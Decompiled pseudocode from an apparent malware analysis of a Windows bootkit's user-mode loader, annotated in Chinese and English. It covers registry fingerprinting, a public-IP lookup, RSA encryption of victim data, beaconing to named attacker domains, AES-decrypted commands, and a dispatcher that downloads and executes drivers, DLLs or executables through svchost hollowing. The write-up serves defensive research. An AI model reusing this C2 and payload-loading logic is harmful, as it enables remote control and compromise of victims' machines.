        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v1);
        return VolumeSerialNumber;
      }
    }
  }

  return VolumeSerialNumber;
}

get_RegisteredOwner_data_140006238

wchar_t *get_RegisteredOwner_data_140006238()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
  v1 = CurrentVersion;
  v2 = 64i64;
  v3 = (char *)v0 - (char *)CurrentVersion;
  do
  {
    if ( v2 == -2147483582 )
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  v6 = 16i64;
  if ( v2 )
    v5 = v1;

  *v5 = 0;
  // RegisteredOwner
  v7 = (char *)deobfuscate_wstring(word_14000B160, 0x10u, 1) - (char *)RegisteredOwner;
  v8 = RegisteredOwner;
  do
  {
    if ( v6 == -2147483630 )
      break;

    v9 = *(__int16 *)((char *)v8 + v7);
    if ( !v9 )
      break;

    *v8++ = v9;
    --v6;
  }
  while ( v6 );

  v10 = v8 - 1;
  if ( v6 )
    v10 = v8;

  *v10 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)CurrentVersion, (const WCHAR *)RegisteredOwner);// ret RegisteredOwner data
}

get_publicip_1400059FC

_WORD *__fastcall get_publicip_1400059FC(void *hSession)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0i64;
  v14 = 4;
  LODWORD(v13) = 0;
  v12 = 0;
  if ( hSession )
  {
    // api.ipify.org
    pswzServerName = deobfuscate_wstring(word_14000B188, 0xEu, 1);
    hConnect = WinHttpConnect(hSession, pswzServerName, 0x50u, 0);
    if ( hConnect )
    {
      // /
      v5 = deobfuscate_wstring(word_14000B1A8, 2u, 0);
      // GET
      v6 = deobfuscate_wstring(word_14000B098, 4u, 0);
      hRequest = WinHttpOpenRequest(hConnect, v6, v5, 0i64, 0i64, 0i64, 0);
      hRequest1 = hRequest;
      if ( hRequest )
      {
        if ( WinHttpSendRequest(hRequest, 0i64, 0, 0i64, 0, 0, 0i64) )
        {
          if ( WinHttpReceiveResponse(hRequest1, 0i64) )
          {
            if ( WinHttpQueryHeaders(hRequest1, 0x20000013u, 0i64, &v12, &v14, 0i64) )
            {
              if ( v12 == HTTP_STATUS_OK )
              {
                Data = (char *)get_HttpReadData(hRequest1, (unsigned int *)&v13);
                if ( Data )
                {
                  if ( (_DWORD)v13 )
                  {
                    Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v13 + 1));
                    v1 = Heap;
                    if ( Heap )
                      str2wstr_140005424(Data, Heap);
                  }

                  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Data);
                }
              }
            }
          }
        }

        WinHttpCloseHandle(hRequest1);
      }

      WinHttpCloseHandle(hConnect);
    }
  }

  return v1;
}

get_CurrentBuild_140005BA0

wchar_t *get_CurrentBuild_140005BA0()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
  v1 = v14;
  v2 = 64i64;
  v3 = (char *)v0 - (char *)v14;
  do
  {
    if ( v2 == -2147483582 )
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  if ( v2 )
    v5 = v1;

  *v5 = 0;
  // CurrentBuild
  v6 = deobfuscate_wstring(word_14000B1B0, 0xDu, 1);
  v7 = 14i64;
  v8 = (char *)v6 - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483632 )
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_ProcessorNameString_1400055A4

wchar_t *get_ProcessorNameString_1400055A4()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v0 = 65i64;
  // \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  v1 = deobfuscate_wstring(word_14000B1F0, 0x41u, 1);
  v2 = v14;
  v3 = (char *)v1 - (char *)v14;
  do
  {
    if ( v0 == -2147483581 )
      break;

    v4 = *(__int16 *)((char *)v2 + v3);
    if ( !v4 )
      break;

    *v2++ = v4;
    --v0;
  }
  while ( v0 );

  v5 = v2 - 1;
  v6 = v0 == 0;
  v7 = 20i64;
  if ( !v6 )
    v5 = v2;

  *v5 = 0;
  // ProcessorNameString
  v8 = (char *)deobfuscate_wstring(word_14000B278, 0x14u, 1) - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483626 )
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_GPU_info_140005758

wchar_t *get_GPU_info_140005758()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
  v0 = deobfuscate_wstring(word_14000B2B0, 0x46u, 1);
  v1 = v14;
  v2 = 71i64;
  v3 = (char *)v0 - (char *)v14;
  do
  {
    if ( v2 == -2147483575 )
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  if ( v2 )
    v5 = v1;

  *v5 = 0;
  // PrimaryAdapterString
  v6 = deobfuscate_wstring(word_14000B340, 0x15u, 1);
  v7 = 22i64;
  v8 = (char *)v6 - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483624 )
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_RAM_GB_140005C78

__int64 get_RAM_GB_140005C78()
{
  unsigned int v0; // ebx
  struct _MEMORYSTATUSEX v2; // [rsp+20h] [rbp-48h] BYREF

  v2.dwLength = 64;
  v0 = 0;
  if ( GlobalMemoryStatusEx(&v2) )
    // 2^20-->K M
    return (unsigned int)(v2.ullTotalPhys >> 20) / 1000;// GB

  return v0;
}

get_ProductName_140005680

wchar_t *get_ProductName_140005680()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
  v1 = v14;
  v2 = 64i64;
  v3 = (char *)v0 - (char *)v14;
  do
  {
    if ( v2 == -2147483582 )
      break;

    v4 = *(__int16 *)((char *)v1 + v3);
    if ( !v4 )
      break;

    *v1++ = v4;
    --v2;
  }
  while ( v2 );

  v5 = v1 - 1;
  if ( v2 )
    v5 = v1;

  *v5 = 0;
  // ProductName
  v6 = deobfuscate_wstring(word_14000B1D0, 0xCu, 1);
  v7 = 15i64;
  v8 = (char *)v6 - (char *)v13;
  v9 = v13;
  do
  {
    if ( v7 == -2147483631 )
      break;

    v10 = *(__int16 *)((char *)v9 + v8);
    if ( !v10 )
      break;

    *v9++ = v10;
    --v7;
  }
  while ( v7 );

  v11 = v9 - 1;
  if ( v7 )
    v11 = v9;

  *v11 = 0;
  return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}

get_IntegrityLevel_14000591C

// ucmShowProcessIntegrityLevel
__int64 get_IntegrityLevel_14000591C()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  dwIntegrityLevel = 0;
  TokenInformationLength = 0;
  Handle = (HANDLE)-1i64;
  if ( NtOpenProcessToken((HANDLE)0xFFFFFFFFFFFFFFFFi64, 0x18u, &Handle) >= 0 )
  {
    NtQueryInformationToken(Handle, TokenIntegrityLevel, 0i64, 0, &TokenInformationLength);
    psid = (PSID *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, TokenInformationLength);
    if ( psid )
    {
      if ( NtQueryInformationToken(Handle, TokenIntegrityLevel, psid, TokenInformationLength, &TokenInformationLength) >= 0 )
      {
        AccountSubAuthorityCount = RtlSubAuthorityCountSid(*psid);
        //                     if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
        //                     {
        //                         t = L"Low Process";
        //                     }
        //                     else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&
        //                         dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
        //                     {
        //                         t = L"Medium Process";
        //                     }
        //                     else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
        //                     {
        //                         t = L"High Integrity Process";
        //                     }
        //                     else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
        //                     {
        //                         t = L"System Integrity Process";
        //                     }
        dwIntegrityLevel = *RtlSubAuthoritySid(*psid, (unsigned __int8)(*AccountSubAuthorityCount - 1));
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, psid);
    }
  }

  if ( Handle )
    NtClose(Handle);

  return dwIntegrityLevel;
}

rsaenc_base64_140001370

CHAR *__fastcall rsaenc_base64_140001370(const WCHAR *indata)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  pcbStructInfo = 550;
  v25 = 0i64;
  v2 = 0i64;
  phKey = 0i64;
  pbInput = 0i64;
  pvStructInfo = 0i64;
  v4 = 4i64;
  pcbResult = 0;
  pcchString = 0;
  Heap = 0i64;
  v6 = pbEncoded;
  // openssl rsa -pubin -inform der -in rsakey_X509_14000A0D0.der  -noout -text


  // Public-Key: (4095 bit)
  // Modulus:
  //     43:43:71:5d:2c:12:70:e2:50:d5:67:e4:05:02:01:
  //     eb:2e:2a:48:c2:b3:31:9c:96:9e:eb:6a:0c:d6:e6:
  //     55:bd:cc:2f:b8:ad:0f:5d:3c:0f:50:68:90:c3:69:
  //     76:aa:9b:c8:f5:0b:3d:bd:0f:ac:8f:fc:b9:bb:b7:
  //     6c:54:c8:2c:c7:46:3e:cc:41:31:ba:76:bd:f0:ea:
  //     aa:2b:cd:ae:57:7b:3a:24:7f:82:f4:d6:01:5f:f0:
  //     02:80:ed:ee:28:e7:9c:17:95:08:3f:db:1b:be:60:
  //     24:6d:ab:3d:3b:e2:87:e6:4c:b6:11:7a:05:6c:be:
  //     7b:47:a3:0b:72:72:7e:b9:86:b0:e5:66:c6:ad:2f:
  //     b7:6b:0c:c6:f4:a3:a6:1b:01:d2:a9:bc:99:96:0e:
  //     a1:3f:d7:a2:df:0c:2c:ef:38:f4:e3:14:16:a2:37:
  //     44:0a:48:ae:0f:cc:bc:00:ec:28:29:c2:ba:26:32:
  //     d0:8c:9e:e7:9c:8b:ea:79:46:dd:2a:df:3f:6e:62:
  //     d6:e2:31:3c:1d:4d:83:53:d9:fb:ef:45:04:0e:34:
  //     50:59:65:84:57:c9:a7:87:76:93:b4:7a:c8:9d:86:
  //     a5:e6:98:15:cd:23:5c:1d:d4:cc:3c:b3:35:54:0e:
  //     8f:79:29:61:c7:5c:e0:55:61:71:e4:d5:d6:22:c9:
  //     5e:98:56:45:96:a6:4b:0e:ac:ac:ce:9b:36:11:d8:
  //     f1:cd:bf:01:55:34:2b:8a:2c:9e:4a:48:7c:8f:97:
  //     24:16:11:0f:1d:85:5c:d0:8c:c3:1c:51:83:a2:af:
  //     b4:61:e8:b8:d3:65:3b:1d:ec:fb:32:a6:7c:10:7d:
  //     9d:c7:3d:7e:c8:f6:6c:16:a9:83:f2:42:a3:9e:1f:
  //     68:e8:88:a4:b4:1e:35:5c:b8:f3:59:8a:de:84:30:
  //     79:c5:ea:1e:e5:25:3f:fe:17:7a:ed:85:2f:c2:7d:
  //     03:34:f3:f6:64:4b:85:47:d0:cb:a6:72:71:43:bf:
  //     a0:ef:d0:73:92:cb:a9:61:52:c9:d2:f7:05:b8:9b:
  //     c9:28:f3:db:dc:0e:e1:dd:8f:24:98:a5:3c:f1:07:
  //     cb:55:58:9d:92:c2:e8:83:0c:9a:eb:f4:fa:15:6f:
  //     8b:d5:d5:69:a4:12:3a:72:78:b1:5b:2d:c1:40:96:
  //     28:37:6d:05:c9:0e:a8:f6:9b:66:1a:ce:86:55:5c:
  //     96:85:03:79:59:c1:51:c6:17:d9:1a:82:cb:88:ca:
  //     d9:15:b8:50:a8:38:1d:d7:d3:b9:f7:5a:6c:9a:d2:
  //     4d:d2:7d:cf:37:9c:15:2e:b2:51:e4:97:da:41:9b:
  //     1a:96:f2:5b:bf:31:ff:ff:0a:b3:7b:3e:81:eb:14:
  //     d8:87
  // Exponent: 65537 (0x10001)
  v7 = rsakey_X509_14000A0D0;
  do
  {
    v8 = *((_OWORD *)v7 + 1);
    *(_OWORD *)v6 = *(_OWORD *)v7;
    v9 = *((_OWORD *)v7 + 2);
    *((_OWORD *)v6 + 1) = v8;
    v10 = *((_OWORD *)v7 + 3);
    *((_OWORD *)v6 + 2) = v9;
    v11 = *((_OWORD *)v7 + 4);
    *((_OWORD *)v6 + 3) = v10;
    v12 = *((_OWORD *)v7 + 5);
    *((_OWORD *)v6 + 4) = v11;
    v13 = *((_OWORD *)v7 + 6);
    *((_OWORD *)v6 + 5) = v12;
    v14 = *((_OWORD *)v7 + 7);
    v7 += 128;
    *((_OWORD *)v6 + 6) = v13;
    v6 += 128;
    *((_OWORD *)v6 - 1) = v14;
    --v4;
  }
  while ( v4 );                                 // 0x80*4

  v15 = *((_DWORD *)v7 + 8);
  v16 = *((_OWORD *)v7 + 1);
  *(_OWORD *)v6 = *(_OWORD *)v7;
  *((_OWORD *)v6 + 1) = v16;
  *((_DWORD *)v6 + 8) = v15;
  v6[36] = v7[36];
  v17 = WideCharToMultiByte(CP_UTF8, 0, indata, -1, 0i64, 0, 0i64, 0i64);
  sz = v17;
  if ( v17 )
  {
    lpMultiByteStr = (CHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v17);
    pbInput = (UCHAR *)lpMultiByteStr;
    if ( lpMultiByteStr )
    {
      if ( WideCharToMultiByte(CP_UTF8, 0, indata, -1, lpMultiByteStr, sz, 0i64, 0i64) )// TO UTF8
      {
        // RSA
        v20 = deobfuscate_wstring(word_14000A068, 4u, 1);
        if ( BCryptOpenAlgorithmProvider(&v25, v20, 0i64, 0) >= 0 )
        {
          if ( CryptDecodeObjectEx(
                 0x10001u,                      // X509_ASN_ENCODING | PKCS_7_ASN_ENCODING
                 (LPCSTR)X509_PUBLIC_KEY_INFO,
                 pbEncoded,
                 pcbStructInfo,
                 0x8005u,                       // CRYPT_DECODE_ALLOC_FLAG|CRYPT_DECODE_NOCOPY_FLAG|CRYPT_DECODE_SHARE_OID_STRING_FLAG
                                                // #define CRYPT_DECODE_NOCOPY_FLAG            0x1
                                                // #define CRYPT_DECODE_SHARE_OID_STRING_FLAG  0x4
                 0i64,
                 &pvStructInfo,
                 &pcbStructInfo) )
          {
            // X509_ASN_ENCODING
            if ( CryptImportPublicKeyInfoEx2(1u, pvStructInfo, 0, 0i64, &phKey) )
            {
              BCryptEncrypt(phKey, pbInput, sz - 1, 0i64, 0i64, 0, 0i64, 0, &pcbResult, BCRYPT_PAD_PKCS1);
              Heap = (BYTE *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, pcbResult);
              if ( Heap )
              {
                if ( BCryptEncrypt(phKey, pbInput, sz - 1, 0i64, 0i64, 0, Heap, pcbResult, &pcbResult, BCRYPT_PAD_PKCS1) >= 0 )
                {
                  CryptBinaryToStringA(Heap, pcbResult, 0x40000001u, 0i64, &pcchString);
                  if ( pcchString )
                  {
                    v2 = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (pcchString + 1));
                    if ( v2 )
                    {
                      // CRYPT_STRING_NOCRLF
                      // 0x40000000

                      // CRYPT_STRING_BASE64
                      // 0x00000001
                      if ( !CryptBinaryToStringA(Heap, pcbResult, 0x40000001u, (LPSTR)v2, &pcchString) )
                      {
                        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v2);
                        v2 = 0i64;
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }

  if ( phKey )
    BCryptDestroyKey(phKey);

  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  if ( pvStructInfo )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, pvStructInfo);

  if ( pbInput )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, pbInput);

  return (CHAR *)v2;
}

urlenc_140005498

_BYTE *__fastcall urlenc_140005498(_BYTE *data, int flag)
{
  _BYTE *Heap; // rsi
  unsigned int size; // edi
  _BYTE *i; // rax
  int v7; // ebx
  char *v8; // r8
  __int64 v9; // r9
  char v10; // cl
  __int64 v11; // rdx
  _BYTE *v12; // rax
  __int64 v13; // rbx

  Heap = 0i64;
  size = 0;
  for ( i = data; *i; ++size )
    ++i;

  v7 = 0;
  if ( size )
  {
    Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, size + 2 * size + 1);
    if ( Heap )
    {
      v8 = data;
      v9 = size;
      // urlenc
      while ( 1 )
      {
        v10 = *v8;
        v11 = (unsigned int)(v7 + 1);
        v12 = &Heap[v7];
        if ( *v8 == '+' )
        {
          *v12 = '%';
          v13 = (unsigned int)(v7 + 2);
          Heap[v11] = '2';
          Heap[v13] = 'B';
          goto LABEL_13;
        }

        if ( v10 == '/' )
          break;

        if ( v10 == '=' )
        {
          *v12 = '%';
          v13 = (unsigned int)(v7 + 2);
          Heap[v11] = '3';
          Heap[v13] = 'D';

LABEL_13:
          v7 = v13 + 1;
          goto LABEL_14;
        }

        *v12 = v10;
        ++v7;

LABEL_14:
        ++v8;
        if ( !--v9 )
          goto LABEL_15;
      }

      *v12 = '%';
      v13 = (unsigned int)(v7 + 2);
      Heap[v11] = '2';
      Heap[v13] = 'F';
      goto LABEL_13;
    }
  }

LABEL_15:
  if ( flag )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, data);

  return Heap;
}

do_1400049F4

先发送获取的信息,再接受指令

__int64 __fastcall do_1400049F4(HttpST *httpst, _BYTE *data)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  Str = data;
  data_1 = 0i64;
  v23 = 4;
  v28 = 0;
  LODWORD(recvsize) = 0;
  wstr1 = 0i64;
  decsz = 0;
  ws = 0i64;
  errorcode = 0;
  if ( !(unsigned int)init_httpst_140004614(httpst) )
  {
    errorcode = 2;
    goto ROUND;
  }

  hConnect = WinHttpConnect(
               httpst->hSession,
               httpst->DataST_20.pswzServerName,
               httpst->DataST_20.sslflag != 0 ? 443 : 80,
               0);
  p_hConnect = &httpst->hConnect;
  httpst->hConnect = hConnect;
  if ( !hConnect )
    goto ROUND;

  // #define WINHTTP_FLAG_SECURE                0x00800000  // use SSL if applicable (HTTPS)

  // #define WINHTTP_FLAG_BYPASS_PROXY_CACHE    0x00000100 // add "pragma: no-cache" request header
  dwFlags = httpst->DataST_20.sslflag != 0 ? 0x800100 : 0x100;
  // POST
  pwszVerb = deobfuscate_wstring(POST_14000AFE0, 5u, 1);
  hRequest = WinHttpOpenRequest(httpst->hConnect, pwszVerb, httpst->DataST_20.pwszObjectName, 0i64, 0i64, 0i64, dwFlags);
  p_hRequest = &httpst->hRequest;
  httpst->hRequest = hRequest;
  if ( !hRequest )
    goto ROUND;

  SECURITY_flag = 0x3300;
  // #define WINHTTP_OPTION_SECURITY_FLAGS                   31
  if ( !WinHttpSetOption(hRequest, 0x1Fu, &SECURITY_flag, 4u) )
    goto ROUND;

  // Content-Type: application/x-www-form-urlencoded
  v11 = deobfuscate_wstring(Content_Type_14000AFF0, 0x30u, 1);
  v12 = strlen(Str);
  v13 = strlen(Str);
  if ( !WinHttpSendRequest(*p_hRequest, v11, 0xFFFFFFFF, Str, v13, v12, 0i64) )
    goto ROUND;

  if ( !WinHttpReceiveResponse(*p_hRequest, 0i64) )
    goto ROUND;

  if ( !WinHttpQueryHeaders(*p_hRequest, 0x20000013u, 0i64, &v28, &v23, 0i64) )
    goto ROUND;

  if ( v28 != HTTP_STATUS_OK )
    goto ROUND;

  // c2回复包 magic 'HP'
  recvdata = (char *)get_HttpReadData(*p_hRequest, (unsigned int *)&recvsize);
  data_1 = recvdata;
  if ( !recvdata
    || (recvsize1 = recvsize, (unsigned int)recvsize < 2)
    || *recvdata != 'H'
    || recvdata[1] != 'P'
    || (HWID_MAC_VolumeSerialNumber_md5wstr = get_HWID_MAC_VolumeSerialNumber_md5wstr(),
        (ws = HWID_MAC_VolumeSerialNumber_md5wstr) == 0i64)
    || (unsigned int)wcslen(HWID_MAC_VolumeSerialNumber_md5wstr) != 32
    || (wstr2str_140005380(ws, s),
        (decdata = (char *)AESCBC256_dec_recvdata_140001060(data_1 + 2, s, recvsize1 - 2, &decsz)) == 0i64)
    || !decsz
    || (wstr = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(decsz + 10)),
        (wstr1 = wstr) == 0i64) )
  {
ROUND:
    ++httpst->RoundIndex;
    v19 = &httpst->hConnect;
    p_hRequest = &httpst->hRequest;
    if ( !ws )
      goto LABEL_22;

    goto LABEL_21;
  }

  str2wstr_140005424(decdata, wstr);
  docommand_140006A38(httpst, wstr1, &errorcode);
  v19 = p_hConnect;

LABEL_21:
  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, ws);

LABEL_22:
  if ( wstr1 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, wstr1);

  if ( data_1 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, data_1);

  if ( *v19 )
  {
    WinHttpCloseHandle(*v19);
    *v19 = 0i64;
  }

  if ( *p_hRequest )
  {
    WinHttpCloseHandle(*p_hRequest);
    *p_hRequest = 0i64;
  }

  return errorcode;
}

init_httpst_140004614

轮询host

__int64 __fastcall init_httpst_140004614(HttpST *httpst)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  ptr = &httpst->DataST_20;
  // I love you hasherezade <3
  deobfuscate_wstring(word_14000AE90, 0x1Au, 1);
  // I was secretly hoping we could be friends
  deobfuscate_wstring(word_14000AED0, 0x2Au, 1);
  // frassirishiproc.com
  urls[0].wshost = deobfuscate_wstring(frassirishiproc_com_14000AF28, 0x14u, 0);
  // /API/hpb_gate.php
  urls[0].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
  urls[0].sslflag = 1;
  urls[0].flag3 = 2;
  // heikickgn.com
  urls[1].wshost = deobfuscate_wstring(heikickgn_com_14000AF80, 0xEu, 0);
  urls[1].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
  urls[1].sslflag = 1;
  urls[1].flag3 = 3;
  urls[2].wshost = deobfuscate_wstring(heikickgn_com_14000AF80, 0xEu, 0);
  urls[2].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
  index = ptr->index;
  urls[2].sslflag = 1;
  if ( httpst->RoundIndex == index )
    return 1;

  freebuf_1400073F4(ptr);
  i = ptr->index;
  if ( ptr->index <= 2u )
  {
    i1 = i;
    ptr->index = i + 1;
    v7 = wcslen(urls[i1].wshost);
    Heap = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v7 + 1));
    ptr->pswzServerName = Heap;
    if ( Heap )
    {
      v9 = wcslen(urls[i1].wspath);
      v10 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v9 + 1));
      ptr->pwszObjectName = v10;
      if ( v10 )
      {
        if ( urls[i1].wshost && urls[i1].wspath )
        {
          v11 = wcslen(urls[i1].wshost);
          wcsncpy_0(ptr->pswzServerName, (const wchar_t *)(unsigned int)(v11 + 1), (size_t)urls[i1].wshost);
          v12 = wcslen(urls[i1].wspath);
          wcsncpy_0(ptr->pwszObjectName, (const wchar_t *)(unsigned int)(v12 + 1), (size_t)urls[i1].wspath);
          ptr->sslflag = urls[i1].sslflag;
          return 1;
        }
      }
    }
  }

  return v1;
}

AESCBC256_dec_recvdata_140001060

PVOID __fastcall AESCBC256_dec_recvdata_140001060(const CHAR *data, UCHAR *key, DWORD datasz, _DWORD *decsz)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v21 = 0i64;
  v22 = 0i64;
  v17 = 0;
  v18 = 0;
  v19 = 0;
  v8 = 0i64;
  v20 = 0;
  v9 = 0i64;
  CryptStringToBinaryA(data, datasz, 1u, 0i64, &v17, 0i64, 0i64);
  if ( v17 )
  {
    Heap = (UCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v17);
    if ( Heap )
    {
      if ( CryptStringToBinaryA(data, datasz, 1u, Heap, &v17, 0i64, 0i64) )
      {
        // AES
        v11 = deobfuscate_wstring(word_14000A078, 4u, 1);
        if ( BCryptOpenAlgorithmProvider(&v21, v11, 0i64, 0) >= 0 )
        {
          // ChainingModeCBC
          v12 = (UCHAR *)deobfuscate_wstring(word_14000A088, 0x10u, 0);
          // ChainingMode
          v13 = deobfuscate_wstring(word_14000A0B0, 0xDu, 0);
          if ( BCryptSetProperty(v21, v13, v12, 0x20u, 0) >= 0 )
          {
            // ObjectLength
            v14 = deobfuscate_wstring(ObjectLength_14000A010, 0xDu, 1);
            if ( BCryptGetProperty(v21, v14, (PUCHAR)&v19, 4u, &v20, 0) >= 0 )
            {
              v15 = (UCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v19);
              v9 = v15;
              if ( v15 )
              {
                if ( BCryptGenerateSymmetricKey(v21, &v22, v15, v19, key, 0x20u, 0) >= 0 )
                {
                  BCryptDecrypt(v22, Heap, v17, 0i64, 0i64, 0, 0i64, 0, &v18, 1u);
                  if ( v18 )
                  {
                    v8 = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v18 + 10);
                    if ( v8 )
                    {
                      if ( BCryptDecrypt(v22, Heap, v17, 0i64, 0i64, 0, (PUCHAR)v8, v18, &v18, 1u) >= 0 )
                      {
                        *decsz = v18;
                      }
                      else
                      {
                        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v8);
                        v8 = 0i64;
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
    }
  }

  if ( v22 )
    BCryptDestroyKey(v22);

  if ( v9 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v9);

  if ( v21 )
    BCryptCloseAlgorithmProvider(v21, 0);

  return v8;
}

docommand_140006A38

Type

​ 1 加载sys、exe、dll

​ 2 通过svchost.exe-hollow,加载exe、dll,并卸载bootkit

​ 3 卸载bootkit

Method == '2' 则保存文件到ProgramData,'1'内存加载

char __fastcall docommand_140006A38(HttpST *httpst, wchar_t *recvdata, _DWORD *isSuccess)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  memset(&wsvalue, 0, sizeof(wsvalue));
  // "interval":
  v6 = deobfuscate_wstring(word_14000B660, 0xCu, 1);
  v7 = getvalue_1400051A4(recvdata, v6);        // 回联间隔
  v8 = v7;
  if ( v7 )
  {
    v9 = 1000 * wtoi((const wchar_t *)v7);
    v10 = 60000;                                // 默认为60s
    if ( v9 )
      v10 = v9;

    httpst->sleep_dwMilliseconds = v10;
    do
    {
      recvdata = getValue_and_Aeskey_140007090(recvdata, &wsvalue);
      if ( !recvdata
        || !wsvalue.Type
        || !wsvalue.Method
        || !wsvalue.File
        || !wsvalue.FileType
        || !wsvalue.auth_token
        || !wsvalue.aes_key )
      {
        break;
      }

      switch ( *wsvalue.Type )
      {
        case '1':
          command_type1_140006318(httpst, &wsvalue);// Download and execute a kernel driver, DLL, or a regular executable
          break;

        case '2':
          command_type2_140006BB0(httpst, &wsvalue, isSuccess);// Download a payload, uninstall the bootkit, and execute the payload – likely used to update the bootkit
          break;

        case '3':                               // 'U'
          command_type3_140006B78(isSuccess);   // Uninstall the bootkit and exit
          break;
      }

      free_WsValue_14000744C(&wsvalue);
    }
    while ( *isSuccess != 1 );

    LOBYTE(v7) = RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v8);
  }

  return (char)v7;
}

getValue_and_Aeskey_140007090

wchar_t *Type;

wchar_t *Method;

wchar_t *File;

wchar_t *cmd_line_b64dec;

wchar_t *User;

wchar_t *FileType;

wchar_t *auth_token;

